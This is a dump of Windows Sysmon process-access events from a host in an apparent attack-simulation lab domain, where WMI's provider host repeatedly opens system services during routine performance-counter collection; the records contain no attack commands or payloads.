21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151878Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151877Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151876Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151875Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151874Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151873Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151872Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151871Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151870Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151869Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151868Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151867Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151866Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151865Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151864Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151863Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 